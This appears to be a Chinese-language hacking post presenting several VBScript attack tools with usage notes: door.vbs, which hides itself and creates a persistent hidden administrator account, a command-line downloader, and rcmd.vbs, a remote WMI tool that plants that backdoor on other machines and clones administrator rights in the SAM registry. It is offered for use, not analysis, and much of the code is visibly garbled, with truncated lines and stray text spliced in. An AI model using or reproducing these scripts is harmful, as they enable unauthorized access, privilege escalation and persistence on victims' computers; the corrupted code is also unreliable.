⿊客必须要知道的⼏个vbs⽂件代码
1. door.vbs
'***************
'door.vbs by ⿊嘿⿊
'***************
dim wsh,FA,FSO
set fso=CreateObject("Scripting.FileSystemObject")
Set FA= FSO.GetFile(WScript.scriptFullName)
FA.Attributes =34
set wsh=CreateObject("WScript.Shell")
wsh.run "net user IUSE_SERVER xyhack.91i /add",0,true
wsh.run "net localgroup administrators IUSE_SERVER /add" ,0,true
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""
wsh.Regwrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD" write "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""
功能:添加不死帐号(随cmd启动⽽启动),在win下彻底隐藏。
使⽤:直接运⾏。
2. ntlm.vbs
'***************
'ntlm.vbs by ⿊嘿⿊
'***************
dim wsh
set wsh=CreateObject("WScript.Shell")
功能:⾃定义telnet的ntml和端⼝。
使⽤:D:\>ntml.vbs 1 999
3. iget.vbs
'***************************
'iget.vbs Mod by ⿊嘿⿊
'***************************
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
黑客必备cmd命令大全sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.sponseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2
功能:命令⾏下下载http⽂件。
使⽤:D:\>iget.vbs xyhack.91i/vbs.rar vbs.rar
4. rcmd.vbs
'***************
'rcmd.vbs by ⿊嘿⿊
'***************
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="") then
set ateObject("wscript.shell")
objShell.Run(" /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
end if
if unt<3 then
usage()
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
usage()
outstreem.write "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator") '20
set tserver(ipaddress,"root/cimv2",username,password)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
objswbemservices.security_.privileges.add 11,true
if errornumber<>0 then
call main()
else
end if
call main()
'***********************************************************
function door()
outstreem.write "Creating the blankdoor .."
set ("win32_process")
cmddoor="cmd /c echo dim wsh,FA,FSO,t>%windir%\system32\svrer.vbs" _
&"&& echo set fso=CreateObject(""Scripting.FileSystemObject"") >>%windir%\system32\svrer.vbs" _
&"&& echo Set FA= FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs" _
&"&& echo FA.Attributes =34>>%windir%\system32\svrer.vbs" _
&"&& echo set t=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net user IUSE_SERVER xyhack.91i /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net localgroup administrators IUSE_SERVER /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""Attrib +h %windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.Close>>%windir%\system32\svrer.vbs"_
&"&& echo set wsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net user IUSE_SERVER xyhack.91i /add"",0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net localgroup administrators IUSE_SERVER /add"" ,0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win dir%\system32\svrer.vbs" _
&"&& write ""HKEY_LOCAL_MACHINE\Software\Microsoft\Command
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& write ""HKEY_CURRENT_USER\Software\Microsoft\Command
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""cmd /c at 20:00,20:10,20:20,20:30 %windir%\system32\SYSTEM.bat"",0,true
>>%windir%\system32\svrer.vbs"
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write "Runing the blankdoor .."
showerror(err.number)
call main()
end function
'***********************************************************
function ca()
Wscript.Echo "enter the causername:"
causername=WScript.StdIn.Readline()
Wscript.Echo "enter the capassword:"
capassword=WScript.StdIn.Readline()
outstreem.write "Getting SID of "&causername&" ...."
set query("select * from win32_useraccount where name="&chr(34)&causername&chr(34))
for each objinstsid in colinstsid
strsid=objinstsid.sid
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
if strsid="" then
call main()
else
end if
outstreem.write "Prepairing .."
set ("win32_process")
showerroronly(err.number)
cmdline="cmd /c echo set oreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs" _
&"&& binaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue >>%temp%\ca.vbs" _ &"&& echo oreg.setbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\"?name&""",""F"",u
value >>%temp%\ca.vbs" _ &"&& echo set sh=createobject(""wscript.shell"")>>%temp%\ca.vbs" _
&"&& write ""HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag"",""1"" >>%temp%\ca.vbs" ate(cmdline)
showerroronly(err.number)
cmdline="cmd /c echo atime=time>%temp%\getsys.vbs" _
&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c at 23:59 cscript %temp%\ca.vbs"",0,true >>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time 23:58:59.90"",0,true >>%temp%\getsys.vbs" _
&"&& echo wscript.sleep(1100)>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time ""^&atime,0,true >>%temp%\getsys.vbs"
showerror(err.number)
outstreem.write "Processing ."
set query("select * from win32_service where name='schedule'")
showerroronly(err.number)
for each objinstsvr in colinstsvr
flag1=0
flag2=0
if objinstsvr.startmode="Disabled" then
objinstsvr.changestartmode("Manual")
flag1=1
end if
if objinstsvr.started=flase then
errnumber=objinstsvr.startservice()
flag2=1
end if
showerroronly(err.number)
showerroronly(err.number)
set tserver(ipaddress,"root/default",username,password).get("stdregprov")
for i=1 to 20
if svalue="1" then
exit for
else
wscript.sleep(500)
end if
next
if flag1 then objinstsvr.changestartmode("Disabled")
if flag2 then objinstsvr.stopservice()
next
if svalue<>"1" then
else
showerror(err.number)
end if
outstreem.write "Clean Up .."
showerroronly(err.number)
showerroronly(err.number)
if svalue="1" then objinstreg.deletevalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag" showerror(err.number)
call main()
end function
function showerroronly(errornumber)
if errornumber Then
if err.description <> "" then
end if
call main()
else
outstreem.write "."
end if
end function
'***********************************************************
function share()
Wscript.Echo string(18,"-")
Wscript.Echo "0.返回CMD> ="
Wscript.Echo "please chose the parameter:"
parameters=WScript.StdIn.Readline()
Select Case parameters
case "quit" , "0"
main()
case "list" , "1"
listshare()
case "open" , "2" '40
openshare()
case "close" ,"3"
closeshare()
end Select
end function
function listshare()
outstreem.write "Listing the Netshare from "&ipaddress&"...."
Set colShares = objswbemservices.ExecQuery("Select * from Win32_Share") showerror(err.number) '50
("Caption"&chr(9)&chr(9)&"Name: "&chr(9)&chr(9)&"Path")
For each objShare in colShares
(objShare.Caption&chr(9)&objShare.Name &chr(9)&chr(9)&objShare.Path) Next
call share()
end function
function openshare()
path=WScript.StdIn.Readline()
sname=WScript.StdIn.Readline()
Const FILE_SHARE = 0
Const MAXIMUM_CONNECTIONS = 25
Set objNewShare = objswbemservices.Get("Win32_Share")
errReturn = objNewShare.Create _
(path, sname, FILE_SHARE, _
MAXIMUM_CONNECTIONS, "默认共享")
call share()
end function
function closeshare()
kname=WScript.StdIn.Readline()
outstreem.write "killing the "&kname&" ...."
Set colShares = objswbemservices.ExecQuery _
("Select * from Win32_Share Where Name ="&"'"&kname&"' ")
For Each objShare in colShares
objShare.Delete
Next
showerror(err.number)
call share()
end function
'***********************************************************
function listsvr()
outstreem.write "Listing the Service from "&ipaddress&"...."
Set colListOfServices = objswbemservices.ExecQuery _
("Select * from Win32_Service")
showerror(err.number)
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"Path Name ")
For Each objService in colListOfServices
if len(objService.name)<8 then
strname=objService.name&chr(9)
else
strname=objService.name
end if
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName) Next
call main()
end function
'************************************************************
function reboot()
outstreem.write "Now, "
strwqlquery="select * from win32_operatingsystem where primary='true'"
set query(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(6)
next
showerror(err.number)
call main()
end function
'*************************************************************
function inf()
outstreem.write "Getting Infomation from "&ipaddress&"...."
set obj1=objget("win32_computersystem")
showerror(err.number)
set obj2=objget("win32_operatingsystem")
set col3=objswbemservices.instancesof("win32_processor")
set obj4=objget("win32_logicalmemoryconfiguration")
set obj5=objget("win32_bios")
set obj6=objget("win32_displayconfiguration")
set col7=objswbemservices.instancesof("win32_diskdrive")
set col8=objswbemservices.instancesof("win32_logicaldisk")
set col9=objswbemservices.instancesof("win32_networkadapterconfiguration")
set col10=objswbemservices.instancesof("win32_quickfixengineering")
wnl "OS Info :"
wnl " Computer Name : "&obj1.name
wnl " User Name : "&obj1.username
wnl " Domain : "&obj1.domain
domainrole=""
select case obj1.domainrole
case 0
domainrole="Workstation"
case 1
domainrole="Member Workstation"
case 2
domainrole="Server"
case 3
domainrole="Member Server"
case 4
domainrole="Backup Domain Controller"
case 5
domainrole="Main Domain Controller"
end select
发表评论